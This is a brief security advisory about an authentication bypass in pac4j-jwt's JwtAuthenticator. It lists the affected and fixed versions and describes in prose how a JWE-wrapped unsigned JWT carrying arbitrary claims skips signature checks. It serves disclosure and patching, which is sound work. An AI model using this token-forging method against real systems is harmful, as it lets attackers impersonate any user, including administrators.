pac4j-jwt Authentication Bypass Vulnerability in JwtAuthenticator
Vulnerability
An authentication bypass vulnerability has been identified in the pac4j-jwt library, specifically in versions prior to 4.5.9, 5.7.9, and 6.3.3. This vulnerability arises in the JwtAuthenticator component when handling encrypted JSON Web Tokens (JWTs). It allows remote attackers to forge authentication tokens by creating a JWE-wrapped PlainJWT with arbitrary subject and role claims. Attackers must possess the server's RSA public key to exploit this vulnerability, as it bypasses signature verification, enabling authentication as any user, including administrators.
Impact
Exploiting this vulnerability allows for authentication bypass, enabling attackers to impersonate any user, including administrative roles, by forging authentication tokens that are accepted by the application.
Remediation
Users of pac4j-jwt should upgrade to version 4.5.9 or newer for the 4.x line, version 5.7.9 or newer for the 5.x line, and version 6.3.3 or newer for the 6.x line.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.